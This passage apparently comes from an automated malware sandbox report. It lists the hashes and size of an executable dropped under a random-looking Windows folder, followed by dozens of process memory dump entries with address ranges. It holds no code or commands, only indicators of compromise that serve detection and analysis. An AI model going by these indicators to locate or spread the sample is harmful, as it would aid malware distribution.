                                                                                                          a992fbd89c34c1aa8f7dc51aaa8c6b3f1bbada7c2394377c5b95d51ad7dd4501

                                                                                                          SHA512

                                                                                                          68931b61ac0c0673e2669934dfaa4b61daed5f5f2b7500215b133840de32f36e352e6a3af576539fd8e350b167130d558c9455120a143d595b2361921aaf5161

                                                                                                        • C:\Windows\trvuvbys\lbntnde.exe

                                                                                                          Filesize

                                                                                                          8.9MB

                                                                                                          MD5

                                                                                                          f29f49d261f7a912b39b07b3ece1e54f

                                                                                                          SHA1

                                                                                                          65550dd3ca12f05a0b80b3a3e1aae879846af883

                                                                                                          SHA256

                                                                                                          6ea9759f789e99ebb7ab9241e6e4ee23d1e2024a49dcfe5f05bbbb2e6b2b5062

                                                                                                          SHA512

                                                                                                          8573cd08f6ccfa604eea5f63d6e18e3844deaf9aebe7f900a762332d0e4045dca345027e00764009dd5c4661c417715db9e8e2f553f1dfa3cff6a4d30e3b8cf8

                                                                                                        • memory/404-247-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/940-131-0x0000000010000000-0x0000000010008000-memory.dmp

                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/940-158-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/952-18-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                                                          Filesize

                                                                                                          396KB

                                                                                                        • memory/952-15-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                                                          Filesize

                                                                                                          396KB

                                                                                                        • memory/1088-228-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/1404-178-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/1424-244-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/1436-217-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/1560-238-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/1732-138-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/1732-129-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/2212-191-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/2540-200-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/2552-242-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/2588-250-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/2592-8-0x0000000000400000-0x0000000000ABA000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2616-0-0x0000000000400000-0x0000000000ABA000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2616-4-0x0000000000400000-0x0000000000ABA000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/3180-221-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/3296-229-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/3512-205-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/3648-195-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/3936-160-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/4224-171-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/4408-87-0x0000000000AA0000-0x0000000000AEC000-memory.dmp

                                                                                                          Filesize

                                                                                                          304KB

                                                                                                        • memory/4700-252-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/4716-225-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/4996-140-0x00007FF74F710000-0x00007FF74F7FE000-memory.dmp

                                                                                                          Filesize

                                                                                                          952KB

                                                                                                        • memory/4996-156-0x00007FF74F710000-0x00007FF74F7FE000-memory.dmp

                                                                                                          Filesize

                                                                                                          952KB

                                                                                                        • memory/5040-153-0x0000000000340000-0x0000000000352000-memory.dmp

                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/5040-253-0x0000000000340000-0x0000000000352000-memory.dmp

                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/5040-227-0x0000000000340000-0x0000000000352000-memory.dmp

                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/5144-248-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/5192-240-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/5236-182-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/5352-235-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/5376-212-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/5416-173-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/5528-232-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/5568-209-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/5860-243-0x00007FF6EBA90000-0x00007FF6EBAEB000-memory.dmp

                                                                                                          Filesize

                                                                                                          364KB

                                                                                                        • memory/6096-241-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-188-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-233-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-208-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-226-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-198-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-214-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-236-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-245-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-175-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-174-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-249-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-222-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/6096-165-0x00000000001E0000-0x00000000001F0000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/6096-163-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.7MB